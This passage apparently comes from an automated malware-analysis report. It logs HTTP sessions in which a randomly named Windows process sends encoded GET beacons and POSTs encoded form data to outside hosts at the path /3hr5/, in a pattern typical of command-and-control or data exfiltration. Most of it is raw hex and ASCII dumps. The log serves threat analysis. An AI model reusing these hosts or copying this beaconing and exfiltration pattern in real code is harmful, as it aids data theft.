ItHmG8CdGPACD3Okrm8fDnMAngL7s33R7wbMImcZEYwKfv6NMCADf9yEoUsRHozjp5v6rUbvPcU0joaIw9qkgoBUIgqas/ef4vRfIVit3D0792/Nq3z79L5OSQ3i45snAByGYhFZJBS2BUG3WwUzG4JChdVbSARVmldTRGMWda8iPuHTr0F9CPXyCBeomABMbR+Q/76jlxhDEa9PqVeIkiDuH+DSNqXFoyzAzavpo4+eUkko2A1CGbctq9Zg3SflXX/6PZFgbOeZkUCwRpLXgXAMyq4H3zq5dZO/l4wmK1DQ6D+Ku4PyKQu52MQj0z3Wq73avP7mnVTHOI9h10nSLpNYzHZsx4i7oGxX9aiPx7VkMwBuVvJVK5ZIwSNeWAWoYYaI/YXPANWUGKJrHjGvW/iSeNvXNzncJC1Xgfv2fWx1QbKO5LLVtAW975exOOgIj3dbrgCWnkJVgeOETT6CdSXegAVBvR5Y0InQZPq1o/etx5H0nxn5b3fn/AUGA7SrEWmqScaNdgirg6imR1DRFuLJ3bZXSJXj5Xw4a51M797092HBJM6cH8Hk6HMPOpeuVeZYaLq7V7QcnV3GIQesxKasIJPFOLCAwwDzeQFLYB5r7R4HgGZG4V8rbM2Ddul/NrewWMc3/I4hAtltnrUcSsQz9uFwewYf/FUKUkrSg1PG/z54EVJz4roZoOcTC6MpzjFAVMQG8+iPQEPFHVu5oXiQOvPDa683XFMVRPeYMjs+GMqlOJAMwRjCE27orJENkDbyZq90CRAPyZ2FtdTHSEudrQEWWI64TYZziNQ+PTPhl9nj7tbY+R1eLm1mOOEUZvYSUI626emn/t/0bs3OWuLhI10Ff+94+6y4JRW9j2+vDldODVTTcTClwiY2rtO9GEK9wQHuIUJqw1fiaAe4yreDc+T4L5W9zj1CDZ8zuror3p+5oI78NVxzbXYHH0/BVJsarm5DYHxur7s3Y8tYOKnF68NelumaJdNwhfD1r4v5zFBqkSzRZMA6m3UIcdSe/7ctCl26btfFUzvs03xOGb0MDDAHSit1lu1yeo/vmx6m4NBm7K2ERnqbboAECGnWEq3LM8B9pTPF4CsTJ2rttmtr4jXYCqg5WX72mis7qTtenira16K0czJ3mT5STfDYPT5EzWgjEOVmE65dtH0XBvKV/DLZTOjyH3Gr47mtEL1huV3aD9zssmBdkU6UnMcBOL8oCnQ8i/AYYe7+CdROa5lWV81hpU9kllbz3pwdUvUbzDDsROrczgetEeCnTuluIl/ppjgBxlLahrDop7NLLNudSsEupdzOlU/2Otdt4s+Ut5z6DDqEodoczPDYYALpTGTKTdQ0hJh3BMelKJiC8j4c8cZCsV9Fbbw8x1+fE2rq+zTWBaAu0A2PujebAhT/VnL+mYIU9u/ZwxXwVoIWAIfpLPVE0w0OmnIOijJEsK2gbU45pUWDX3EYpYGjykS8EHrolVZe2ie7aeg9dya/9n9g5pN0URK6x0cnArrpDlON4NuaKahxMDFxYDryA8InLKQW1oSEdESl9izigzGBpk6RgNE48r0KAcmr5p5yviROxNgJjeg4a1p0WIeo32h8x0NCQbdqLuCiwRuo0jsFd9ucxaacpvUBt+RgO6ry2wZVK+hnz9ndfhfzZ
                                                                                                                              Dec 4, 2023 15:24:54.325954914 CET9056OUTData Raw: 6a 57 35 6d 30 65 64 72 6d 7a 61 67 61 56 64 2f 64 56 50 54 65 4c 52 43 37 49 5a 58 5a 45 59 56 55 38 2b 49 4a 34 35 38 44 6a 56 39 45 42 5a 66 72 64 77 6f 68 43 74 55 36 53 53 77 66 53 59 75 69 4a 4b 56 50 6d 4e 64 5a 66 48 2b 39 35 78 32 6e 59
                                                                                                                              Data Ascii: jW5m0edrmzagaVd/dVPTeLRC7IZXZEYVU8+IJ458DjV9EBZfrdwohCtU6SSwfSYuiJKVPmNdZfH+95x2nYvPfBhiv1FzRiE7cmoVjm2jvhaldFtygn6EjtfSBVHq4LO5Ps5LJ9GplAgX9Ix5fnTlIKORBFXyNkFssdoaClMQnf3/KuQBA90mDVTptDxK9Ma9ieBZH53oR+H7dF+5+o9qmpUC6Ppdg1VjhDSUyxyNd4HpDD7BXYB
                                                                                                                              Dec 4, 2023 15:24:54.506725073 CET2626OUTData Raw: 4e 73 73 38 69 31 69 71 2f 75 54 2b 45 6d 4f 58 66 7a 44 6a 71 6a 6f 4b 4d 35 6d 38 7a 4e 76 57 57 63 54 58 67 55 65 4d 4d 30 69 61 67 37 78 4e 61 62 57 48 64 71 64 6b 57 67 70 41 52 47 42 62 30 69 77 50 43 52 6b 45 78 32 67 62 4a 58 44 55 59 31
                                                                                                                              Data Ascii: Nss8i1iq/uT+EmOXfzDjqjoKM5m8zNvWWcTXgUeMM0iag7xNabWHdqdkWgpARGBb0iwPCRkEx2gbJXDUY1EmNr+RiGVeYzDQTFwdhrizt96xlohUBybb/JhJK///4tIAFwbnEP6gt/D2YHnnOvw/BcvgxziTCzYT3p9N+rhqDfHNDDBc1eiBbPggcnjksfVPK3Avah3BSIBEWqBIdPwIeVZ5pXnyzkenKv8jnbhgfpFwzwswtRG
                                                                                                                              Dec 4, 2023 15:24:54.506767035 CET1340OUTData Raw: 73 76 78 35 4e 31 39 41 47 30 38 4d 5a 39 62 38 77 73 30 68 78 37 38 45 44 4a 78 74 6d 66 6f 39 65 64 59 57 32 72 39 4f 4a 35 52 79 6b 47 55 65 53 45 56 6e 6b 78 66 6c 5a 51 41 50 42 4e 72 33 75 38 78 62 6a 41 72 77 48 42 59 78 6c 67 68 69 77 6b
                                                                                                                              Data Ascii: svx5N19AG08MZ9b8ws0hx78EDJxtmfo9edYW2r9OJ5RykGUeSEVnkxflZQAPBNr3u8xbjArwHBYxlghiwkh/U9n7Ppw6RpoLD/1JmHvod1UGQOx7+CXO0KyscoQNjoc/9Z0q0imMN81jM+oOwT7tjSoGvfREvpGM+3yJtS5ZpOgC36NkEwKyum7gC2K+PZtzS0MSquKq+a/BtOo3XCqnVa37ntp5CZLaXlkrsA+eBjoRQdsx0wJ
                                                                                                                              Dec 4, 2023 15:24:54.506830931 CET1340OUTData Raw: 57 33 32 59 59 33 64 4b 72 76 79 48 65 66 55 38 44 6a 6f 37 4c 52 64 6f 7a 70 73 72 42 48 57 74 77 39 34 59 6d 69 6c 6f 62 75 6e 58 55 33 36 6e 38 52 6e 70 58 71 58 35 43 37 34 4b 55 64 38 74 77 4b 77 77 64 68 34 68 36 2f 72 6e 6e 4b 6d 43 50 4d
                                                                                                                              Data Ascii: W32YY3dKrvyHefU8Djo7LRdozpsrBHWtw94YmilobunXU36n8RnpXqX5C74KUd8twKwwdh4h6/rnnKmCPMXoeA8AHSGPX9pPFPauqAKH+ScvWKJMY4lPG0y0Csv9YLh3VZbKjROLLhjSE7lxoRA1whTBD3Lol0Yn3RKnALGfQuCRXDel75R3wVIp5HnNPpasSJJSJ1ATOXHRNg6ppYoOWGRJJbZ2ilWgaFdm7e+fTwMkH5/thkS
                                                                                                                              Dec 4, 2023 15:24:54.506891012 CET387INHTTP/1.1 405 Not Allowed
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:54 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Content-Length: 154
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Allow: GET, POST, HEAD
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>
                                                                                                                              Dec 4, 2023 15:24:54.506990910 CET5198OUTData Raw: 4a 6f 4e 64 46 38 54 34 6c 78 75 57 34 4a 32 6c 69 48 4a 54 67 53 75 72 61 33 46 6d 79 6c 78 70 54 49 39 66 69 7a 5a 42 61 42 42 69 4f 51 57 74 70 63 70 61 6b 4a 56 41 63 45 6c 59 34 71 2f 30 42 2f 71 32 4f 75 77 61 68 39 6f 75 61 34 46 73 7a 37
                                                                                                                              Data Ascii: JoNdF8T4lxuW4J2liHJTgSura3FmylxpTI9fizZBaBBiOQWtpcpakJVAcElY4q/0B/q2Ouwah9oua4Fsz7Y521y+i3Jl9cGQX1NpIyDV3K7FgpXfOiORubzB2LbWObW6zbw6vltFlkEJL3KDWXOeu+CJwgWsijtilrQJ1d7FHSd9CatH0Im9dwp/aUVNxnHjAJ2X4BcYqlfn8e5mj78eixoXlBFq/fvGKMydivarG9oKFLCiuuy
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET2626OUTData Raw: 45 68 58 42 78 43 6d 6a 33 64 57 6e 71 6c 4a 73 6f 2f 6f 71 77 4c 37 39 33 4f 6d 2f 62 35 46 62 50 42 7a 46 43 64 6e 51 51 67 30 34 2f 41 77 4a 6c 68 4e 62 2f 44 78 70 39 51 68 36 69 56 78 54 61 58 58 71 37 71 78 4c 71 33 5a 38 53 72 46 77 55 66
                                                                                                                              Data Ascii: EhXBxCmj3dWnqlJso/oqwL793Om/b5FbPBzFCdnQQg04/AwJlhNb/Dxp9Qh6iVxTaXXq7qxLq3Z8SrFwUfB+cyz6iTRy3sb/ztmsXgRDeFTiegq9Kkn/LTORbe1u1KCGjC3n6MTCBLKz+AqPpQOYSY4h49g76x29umrE64AcYT/M1QpKnnwqKObiMtMC1PQvjVi4wCKs9Twf/fOFCLOvDYYdC3hIfDrWmd45O6jQCRMWrDvFSnG
                                                                                                                              Dec 4, 2023 15:24:54.507164955 CET5198OUTData Raw: 36 72 78 33 6d 70 34 5a 68 75 4d 41 34 7a 48 57 50 42 31 56 4d 74 6d 42 61 72 45 39 4f 4c 70 44 4a 78 6c 74 51 5a 6d 62 50 5a 6f 66 6b 2b 72 52 39 6d 33 49 44 4d 71 63 34 61 4a 2b 39 53 57 36 5a 53 79 4d 4a 37 7a 61 72 49 54 74 71 53 4c 31 4c 50
                                                                                                                              Data Ascii: 6rx3mp4ZhuMA4zHWPB1VMtmBarE9OLpDJxltQZmbPZofk+rR9m3IDMqc4aJ+9SW6ZSyMJ7zarITtqSL1LPplYYTT7FukI+VgMf10EpLLnS5UaIzKYk4rTZF6p6fAFcR7maTT4MvM/iJug28mT2fI2bLlG97NBjjjXMNIMM48il8lcsajJui/5aO+HHf1r7mBoSV60MR7VrpQj7+FM0Lcn3rB8fMXgeYWbnkFEza0B2KPaoZpqmx
                                                                                                                              Dec 4, 2023 15:24:54.507347107 CET5198OUTData Raw: 39 49 32 4f 62 59 67 75 56 53 73 51 51 73 2b 68 59 4c 42 4c 74 52 2b 73 75 38 43 30 44 66 78 6b 66 44 50 48 78 62 43 56 37 66 38 42 75 37 52 41 69 36 72 67 5a 57 75 46 51 62 73 41 33 71 37 47 4f 58 55 39 79 5a 35 39 55 65 49 35 46 72 42 70 43 31
                                                                                                                              Data Ascii: 9I2ObYguVSsQQs+hYLBLtR+su8C0DfxkfDPHxbCV7f8Bu7RAi6rgZWuFQbsA3q7GOXU9yZ59UeI5FrBpC11SxBGL3kEd3The4WQ8rvY8JTHtZNAyJ33yUpPhkCGjIi0EijwtBddNl2BI+fPk+tUI5PuvhfevTbQCfZrTVSkiOgo161biYSSQqI49sGhDZte6BxdRgswueC5cHQmLFPqkYvrpVZTehUZQ1/vzHEJfpQKPwt2Ai2x
                                                                                                                              Dec 4, 2023 15:24:54.549499035 CET2626OUTData Raw: 48 75 49 30 65 6b 61 59 4c 30 50 54 58 42 59 6f 2f 54 31 75 4e 57 30 77 61 42 71 62 74 4d 4b 75 61 4e 63 2b 55 64 47 52 2f 31 6d 42 73 4f 71 6f 64 67 76 63 4f 58 38 68 52 4e 37 61 76 4d 6f 32 4b 44 39 4e 76 49 32 66 2f 55 62 49 4c 62 66 61 63 30
                                                                                                                              Data Ascii: HuI0ekaYL0PTXBYo/T1uNW0waBqbtMKuaNc+UdGR/1mBsOqodgvcOX8hRN7avMo2KD9NvI2f/UbILbfac0m1AcatiHmzNV4ZyOA0a12EMhEQm4kfBoXm2kL+tyEz8cUjaUiaWJyuyUSyvIFOA632uobwHPnMVf9nTdOhRK5frpwTWNchrxajQsvmuQA6kuNz0V74C8v68QmzKxFBplU5kucdZE7Acu1QI86h6vcyIkAxNkb0kCA
                                                                                                                              Dec 4, 2023 15:24:54.687475920 CET3912OUTData Raw: 77 41 36 67 52 62 45 68 72 55 6d 43 64 59 32 37 51 57 67 52 6a 66 49 69 44 75 68 56 39 2f 47 4e 46 31 78 5a 7a 53 59 74 64 37 46 4f 62 61 69 66 34 4a 57 46 6b 50 36 32 4e 66 30 6d 67 69 4d 56 6f 49 39 37 49 31 36 53 79 31 36 49 62 6c 7a 4b 76 57
                                                                                                                              Data Ascii: wA6gRbEhrUmCdY27QWgRjfIiDuhV9/GNF1xZzSYtd7FObaif4JWFkP62Nf0mgiMVoI97I16Sy16IblzKvW91WY55wKp2ipRSfdzGCafeAJf+kmug5CuUERiJQAsqXQ6ZWGf7Y5olN/mhizdcdxCaISa53MvTGfc/buJj9CWib7dycpROcYHPnvQUfXGH65BCuS57Bmzce/0buW36sRXBDTzslseY/kbet+GDL0OUZbRlJVW7lQN


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              36192.168.11.205016789.31.143.90808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:24:57.024666071 CET541OUTGET /3hr5/?TZd=mIVLDg45zmTFrESw9faeiDzJXXUQkT31xJX0RHf3EtohXuktSLitc4YcqcRWfkqc8sDZtVKgsH1VZ8DqKxZju6hVCIK2DTgKDw==&1dr=yP5PQD38 HTTP/1.1
                                                                                                                              Host: www.eigenheimstattmiete.com
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Dec 4, 2023 15:24:57.205205917 CET213INHTTP/1.1 200 OK
                                                                                                                              Date: Mon, 04 Dec 2023 14:24:57 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              Server: UD Webspace 3.2
                                                                                                                              Data Raw: 31 39 65 30 0d 0a
                                                                                                                              Data Ascii: 19e0
                                                                                                                              Dec 4, 2023 15:24:57.205296993 CET1340INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 72 65 67 69 73
                                                                                                                              Data Ascii: <!DOCTYPE html><html lang="de"><head><meta name="description"content="Domain registriert bei united-domains.de"><meta http-equiv="Content-Type"content="text/html; charset=UTF-8"><title>Domain im Kundenauftrag registriert</title><style>body,htm
                                                                                                                              Dec 4, 2023 15:24:57.205363989 CET1340INData Raw: 54 70 45 41 50 59 61 64 38 47 41 36 41 41 41 41 41 58 52 53 54 6c 4d 41 51 4f 62 59 5a 67 41 41 42 38 70 4a 52 45 46 55 65 4e 72 74 6d 6f 75 53 6f 79 6f 51 51 42 73 78 43 42 68 41 35 50 48 2f 6e 33 70 74 6e 6f 62 64 5a 4a 78 39 31 63 79 74 6e 4b
                                                                                                                              Data Ascii: TpEAPYad8GA6AAAAAXRSTlMAQObYZgAAB8pJREFUeNrtmouSoyoQQBsxCBhA5PH/n3ptnobdZJx91cytnKpJCELTHkHJbuDN94WwVSFihjefhggXYwwhRHyzHN58BqJCDEbNal1nE5Eg4M1lePB2JcSGeMK/V/JVjCU438SqQjzznoSXIH6FyqScESIWgoE3F/wJqMxhSm/MWhRo4tvgx1gBHUZayfuofFzh/wpTDP4Eyjzb1oC
                                                                                                                              Dec 4, 2023 15:24:57.205600977 CET1340INData Raw: 51 37 63 35 2b 38 34 7a 32 77 33 36 44 37 57 50 79 31 51 48 2b 36 4b 4f 79 53 51 47 51 32 46 7a 65 43 4e 61 50 36 2b 48 54 58 42 4d 62 7a 58 64 78 41 51 51 43 38 66 67 72 50 5a 6c 78 51 33 73 61 52 41 4d 2b 66 77 75 64 72 56 73 71 52 76 42 5a 34
                                                                                                                              Data Ascii: Q7c5+84z2w36D7WPy1QH+6KOySQGQ2FzeCNaP6+HTXBMbzXdxAQQC8fgrPZlxQ3saRAM+fwudrVsqRvBZ4ztdeEDhNkDAXBfL4gPlQYKjGmaqdg+GMKRMiPOwDWd8HVjwhLr6kXw9VPjIgvO4Dq0lft57Y/KXAni9wFy8IVNGblbE1XBM47venDwXa2IBxPo1X5AeBqxie3aE8RYYV/PybyByG+Uo+EKji5x4idvTxmiEjAR8KZ
                                                                                                                              Dec 4, 2023 15:24:57.205691099 CET1340INData Raw: 4a 64 30 6e 6b 47 32 58 4f 48 4d 42 77 36 55 5a 69 45 47 77 30 35 65 47 33 72 56 47 61 33 51 42 57 48 42 50 6e 61 78 69 49 52 32 37 4c 2f 68 42 45 69 42 33 66 59 50 6c 71 4c 67 42 4e 6c 39 79 4f 33 77 6c 6b 70 44 55 68 6b 70 63 31 61 6c 4a 2f 6f
                                                                                                                              Data Ascii: Jd0nkG2XOHMBw6UZiEGw05eG3rVGa3QBWHBPnaxiIR27L/hBEiB3fYPlqLgBNl9yO3wlkpDUhkpc1alJ/ozFWrPUTtj+qDwiSxw0HaaQR6VA7hKghMPMSqf/AOVXTmgqvu9mAAAAAElFTkSuQmCC');overflow:hidden;text-indent:-9999px;font-size:0;color:rgba(255,255,255,0);text-align:left}#l
                                                                                                                              Dec 4, 2023 15:24:57.205750942 CET1340INData Raw: 6c 74 2e 20 53 69 65 20 77 69 72 64 20 62 65 69 20 6a 65 64 65 72 20 6e 65 75 65 6e 20 44 6f 6d 61 69 6e 20 68 69 6e 74 65 72 6c 65 67 74 20 75 6e 64 20 7a 65 69 67 74 2c 20 64 61 73 73 20 64 69 65 20 6e 65 75 65 20 44 6f 6d 61 69 6e 20 65 72 72
                                                                                                                              Data Ascii: lt. Sie wird bei jeder neuen Domain hinterlegt und zeigt, dass die neue Domain erreichbar ist.<br>Ohne diese Platzhalter-Seite w&uuml;rden Besucher eine Fehlermeldung erhalten. Als Kunde von united-domains k&ouml;nnen Sie diese Domain in Ihrem
                                                                                                                              Dec 4, 2023 15:24:57.205806971 CET255INData Raw: 77 20 6e 6f 6f 70 65 6e 65 72 22 3e 44 61 74 65 6e 73 63 68 75 74 7a 68 69 6e 77 65 69 73 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 2d 77 72 61 70 70 65 72 22 3e 3c 64 69
                                                                                                                              Data Ascii: w noopener">Datenschutzhinweise</a></p></div></div><div class="footer-wrapper"><div class="footer">&copy; united-domains AG. <span>&nbsp;Alle Rechte vorbehalten.</span></div></div></body></html>0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              37192.168.11.205016891.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:02.576416016 CET810OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.neuvillette.org
                                                                                                                              Referer: http://www.neuvillette.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 184
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6e 33 2f 66 4c 6f 41 2f 49 4a 57 6e 69 66 35 67 64 68 42 43 49 43 73 30 52 77 46 71 4e 65 56 6d 4b 70 30 57 38 75 4e 56 78 34 48 38 64 69 44 69 52 54 66 4b 49 4f 69 79 69 53 7a 67 39 69 5a 64 55 46 53 31 39 4c 30 75 74 32 61 77 52 4a 44 68 44 75 32 53 67 71 65 4d 55 2b 54 6c 7a 6c 49 49 37 64 67 5a 4c 6f 75 30 56 4e 79 49 55 59 79 71 32 79 33 79 69 62 31 67 41 63 71 68 41 61 44 30 4f 2f 32 6c 59 34 50 64 2f 65 63 67 30 39 4c 31 62 49 2f 4c 79 4d 36 2f 36 32 6d 69 65 2b 4c 59 31 43 78 46 34 77 61 49 38 47 47 44 54 37 7a 4d 47 51 3d 3d
                                                                                                                              Data Ascii: TZd=n3/fLoA/IJWnif5gdhBCICs0RwFqNeVmKp0W8uNVx4H8diDiRTfKIOiyiSzg9iZdUFS19L0ut2awRJDhDu2SgqeMU+TlzlII7dgZLou0VNyIUYyq2y3yib1gAcqhAaD0O/2lY4Pd/ecg09L1bI/LyM6/62mie+LY1CxF4waI8GGDT7zMGQ==
                                                                                                                              Dec 4, 2023 15:25:02.763046980 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:02 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              38192.168.11.205016991.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Dec 4, 2023 15:25:05.275269032 CET1150OUTPOST /3hr5/ HTTP/1.1
                                                                                                                              Host: www.neuvillette.org
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Origin: http://www.neuvillette.org
                                                                                                                              Referer: http://www.neuvillette.org/3hr5/
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 524
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) QuickLook/5.0
                                                                                                                              Data Raw: 54 5a 64 3d 6e 33 2f 66 4c 6f 41 2f 49 4a 57 6e 34 2b 4a 67 52 67 42 43 4f 69 73 33 64 51 46 71 55 4f 56 59 4b 70 49 57 38 73 68 46 78 4c 7a 38 63 48 2f 69 57 52 6e 4b 4c 4f 69 79 33 69 79 72 2b 53 5a 57 55 46 57 39 39 4a 77 75 74 79 4b 77 66 61 37 68 54 4f 32 52 30 36 65 50 44 4f 54 6b 33 6c 49 53 37 64 73 76 4c 73 4f 30 57 35 4b 49 56 65 65 71 78 67 66 78 6d 37 31 6d 43 63 71 75 62 4b 44 71 4f 2f 36 58 59 39 43 6d 34 6f 63 67 30 63 72 31 61 49 2f 49 38 38 36 38 78 57 6e 36 50 4f 37 64 2f 43 52 34 6f 77 62 32 78 45 4c 79 66 62 75 55 52 4b 2f 2b 43 47 70 6d 70 76 30 52 79 30 38 50 44 75 2b 76 67 50 55 38 68 62 48 61 48 38 2f 6d 30 6f 4a 39 50 51 36 79 2b 74 51 4f 6e 4b 51 31 6b 32 38 4a 68 63 68 2f 4b 4d 62 58 79 6b 57 73 6c 65 35 50 32 64 70 43 33 39 52 62 54 43 77 69 6f 69 69 36 49 2b 47 71 4b 76 50 31 48 79 4e 76 48 6c 4a 51 45 65 57 53 4d 51 67 34 4a 70 46 47 37 32 33 36 55 67 48 4f 77 59 6e 59 6e 43 6e 41 6f 4c 62 64 4d 4a 37 7a 72 6a 54 79 6d 45 78 48 41 36 6f 68 6e 55 4f 72 6a 58 31 57 31 4b 54 70 49 36 32 77 73 4c 39 4d 4a 63 6d 74 5a 69 75 50 55 37 54 6d 56 56 6a 55 38 44 76 2f 52 54 4c 67 76 76 69 71 72 54 42 41 57 37 76 48 52 76 52 33 34 76 73 2f 55 75 32 63 77 4f 50 4c 72 34 73 78 75 78 6d 30 2b 38 77 6c 7a 77 5a 36 4c 6f 35 55 46 47 48 61 42 65 74 41 50 4c 51 73 37 35 51 49 6c 63 32 5a 53 50 6d 55 30 52 6a 49 36 75 4d 30 73 65 58 70 70 35 61 78 57 35 62 79 43 34 64 6f 78 5a 4b 31 78 66 78 49 50 30 6d 77 68 32 68 6a 5a 68 55 48 39 69 32 72 61 74 79 54 55 51 38 30 43 47 5a 49 50 64 32 53 55 2f 78 41 44 52 73 30 34 70 76 6f 39 63 6b 3d
                                                                                                                              Data Ascii: TZd=n3/fLoA/IJWn4+JgRgBCOis3dQFqUOVYKpIW8shFxLz8cH/iWRnKLOiy3iyr+SZWUFW99JwutyKwfa7hTO2R06ePDOTk3lIS7dsvLsO0W5KIVeeqxgfxm71mCcqubKDqO/6XY9Cm4ocg0cr1aI/I8868xWn6PO7d/CR4owb2xELyfbuURK/+CGpmpv0Ry08PDu+vgPU8hbHaH8/m0oJ9PQ6y+tQOnKQ1k28Jhch/KMbXykWsle5P2dpC39RbTCwioii6I+GqKvP1HyNvHlJQEeWSMQg4JpFG7236UgHOwYnYnCnAoLbdMJ7zrjTymExHA6ohnUOrjX1W1KTpI62wsL9MJcmtZiuPU7TmVVjU8Dv/RTLgvviqrTBAW7vHRvR34vs/Uu2cwOPLr4sxuxm0+8wlzwZ6Lo5UFGHaBetAPLQs75QIlc2ZSPmU0RjI6uM0seXpp5axW5byC4doxZK1xfxIP0mwh2hjZhUH9i2ratyTUQ80CGZIPd2SU/xADRs04pvo9ck=
                                                                                                                              Dec 4, 2023 15:25:05.459450960 CET353INHTTP/1.1 405 Not Allowed
                                                                                                                              date: Mon, 04 Dec 2023 14:25:05 GMT
                                                                                                                              content-type: text/html
                                                                                                                              content-length: 154
                                                                                                                              server: NginX
                                                                                                                              connection: close
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                              Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              39192.168.11.205017091.195.240.19808076C:\Program Files (x86)\xBtEEHVveuQicIceYFyfhlDfihQuJpZjmMFRvDFoPTfQADjsKirsjstcrRvOzQVZoOfOU\czazZqNSMxullu.exe
                                                                                                                              TimestampBytes transferredDirectionData
